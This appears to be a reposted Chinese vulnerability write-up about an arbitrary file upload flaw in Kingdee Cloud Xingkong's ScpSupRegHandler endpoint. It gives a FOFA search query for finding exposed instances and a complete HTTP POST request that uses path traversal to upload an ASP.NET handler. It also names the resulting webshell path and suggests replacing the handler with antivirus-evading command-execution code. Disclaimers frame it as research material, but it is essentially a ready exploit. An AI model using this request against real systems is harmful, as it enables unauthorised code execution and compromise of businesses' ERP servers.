请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习交流使用,如若非法他用,与平台和本文作者无关,需自行负责!
00
漏洞概述
金蝶云-星空 ScpSupRegHandler接口存在任意文件上传漏洞
01
空间搜索语法
fofa
icon_hash="-1629133697" && title=="金蝶云星空"
02
利用过程
登录界面
可修改文件内容为免杀代码上传执行命令。
POST /k3cloud/SRM/ScpSupRegHandler HTTP/2
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Content-Length: 836
Content-Type: multipart/form-data; boundary=2ac719f8e29343df94aa4ab49e456061
Accept-Encoding: gzip, deflate, br
--2ac719f8e29343df94aa4ab49e456061
Content-Disposition: form-data; name="dbId_v"
.
--2ac719f8e29343df94aa4ab49e456061
Content-Disposition: form-data; name="FID"
2023
--2ac719f8e29343df94aa4ab49e456061
Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/ixxnwlie.ashx."
Content-Type: text/plain
<%@ WebHandler Language="C#" Class="TestHandler" %>
using System;
using System.Web;
public class TestHandler : IHttpHandler {
public void
ProcessRequest (HttpContext context) {
context.Response.ContentType= "text/plain";
context.Response.Write("zzyqyxih");
}
public bool IsReusable {
get {return false; }
}
}
--2ac719f8e29343df94aa4ab49e456061--
漏洞存在如下
webshell路径
http://xxx/K3Cloud/uploadfiles/ixxnwlie.ashx
03
nuclei
获取脚本关注本公众号后发送:金蝶云2
✓
关注我们
原文始发于微信公众号(天澜实验室):金蝶云-星空 ScpSupRegHandler任意文件上传
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论